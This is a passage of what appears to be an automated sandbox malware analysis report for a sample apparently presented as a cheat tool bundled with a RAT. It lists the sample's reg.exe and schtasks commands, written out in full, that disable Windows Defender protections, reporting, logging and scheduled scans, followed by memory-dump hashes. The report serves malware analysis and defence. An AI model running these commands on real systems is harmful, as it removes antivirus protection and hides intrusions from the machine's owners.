                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:41
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:07:37:12
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:07:37:12
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:07:37:12
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: yU_H
                                                    • API String ID: 0-404771944
                                                    • Opcode ID: 416753681357ddfd249258d8ef95116d8341faa25a4af0dbf1ab1f6c5d87e745
                                                    • Instruction ID: 8affd309af83df65f61199674f878408720b01f2e2dde0400ee417e242dd0c52
                                                    • Opcode Fuzzy Hash: 416753681357ddfd249258d8ef95116d8341faa25a4af0dbf1ab1f6c5d87e745
                                                    • Instruction Fuzzy Hash: E0910932F18E090FDBA4EA1CD8956BDB3D1EB99340F40017AE44EE3292DE39AC4247C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: yU_H
                                                    • API String ID: 0-404771944
                                                    • Opcode ID: 7fb06a38453e3619c165e43b98cb8cba08d4c06439f1bb778e4e393998a32795
                                                    • Instruction ID: a2b0fe8124a227d2b73d95d52d82a0b0d7913dab8b2e029c989dbd8865f6134e
                                                    • Opcode Fuzzy Hash: 7fb06a38453e3619c165e43b98cb8cba08d4c06439f1bb778e4e393998a32795
                                                    • Instruction Fuzzy Hash: 2091E835F18E090FDBA4EA1CD8956BDB3D1EB99350F40017AE44EE3296DE39AC4257C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a97bc4f5824e62c06f68ab18e206a0572b9b6fbcf27c504f4b61621c37ac4356
                                                    • Instruction ID: 095e09311d72dc8fd861b0544154b4e87f389863efbec1f582d48eea68265930
                                                    • Opcode Fuzzy Hash: a97bc4f5824e62c06f68ab18e206a0572b9b6fbcf27c504f4b61621c37ac4356
                                                    • Instruction Fuzzy Hash: E5C14735B08A8A4FEB54DF6888A52B977E1FF9A310F04057AD50DE72D2DE7DA802C741
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eeda7efa7921baa5899b697edec5a47c33897822b5b03cf0b992f7b942b1f5cf
                                                    • Instruction ID: d1d67b71f772d9ede477ca618dea5fa6fd327d1f8ea1b6ab583b03bf16aa5785
                                                    • Opcode Fuzzy Hash: eeda7efa7921baa5899b697edec5a47c33897822b5b03cf0b992f7b942b1f5cf
                                                    • Instruction Fuzzy Hash: 6AA10825B0DA864FEB51AF6884A02F97791FF83340F0401BAD58AE72C7CE6EA8019351
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc4f9a392979443dfa8b6be3100abbafa6bd5af7875406a546b9098cec9b5149
                                                    • Instruction ID: 626f092fb87d3650e0fc6ae439c57f8ff239b2d2f9e510f011c3d11ff2953e56
                                                    • Opcode Fuzzy Hash: cc4f9a392979443dfa8b6be3100abbafa6bd5af7875406a546b9098cec9b5149
                                                    • Instruction Fuzzy Hash: DF811731B1CA094FE798DB6C94997B9B7E1EF99311F04427ED04EE3292DE65AC428780
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7925902f72d92c0a05337e6b9c7d23e63881c6ff4486e426209d69061a4d8e2d
                                                    • Instruction ID: 31158edcdfdc350a7854f5f1a9ecabc492e8b172f0f7219dc29f41858e8a3e00
                                                    • Opcode Fuzzy Hash: 7925902f72d92c0a05337e6b9c7d23e63881c6ff4486e426209d69061a4d8e2d
                                                    • Instruction Fuzzy Hash: 62612A31B1CB490FE758AA6C986627A77C5EB9A310F44427EF94DD3393DD69AC0243C2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1aeb0ade833081ab5a070b1b141fe5537166348499f0424aa2eaa407e0a3360
                                                    • Instruction ID: 758e938b2050475bcab0346d23b0cd5bbdcc3ed70d1c6a6ac332df4baa2eff17
                                                    • Opcode Fuzzy Hash: e1aeb0ade833081ab5a070b1b141fe5537166348499f0424aa2eaa407e0a3360
                                                    • Instruction Fuzzy Hash: 6851BE31A0CB5C4FDB58DF9888596E9BBF1FF99310F0482ABD449D7252DA34A845CB82
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f453d236df1ef3784520b6d91e51066a2ed400d62c93f48bce2e7d1ef01a9da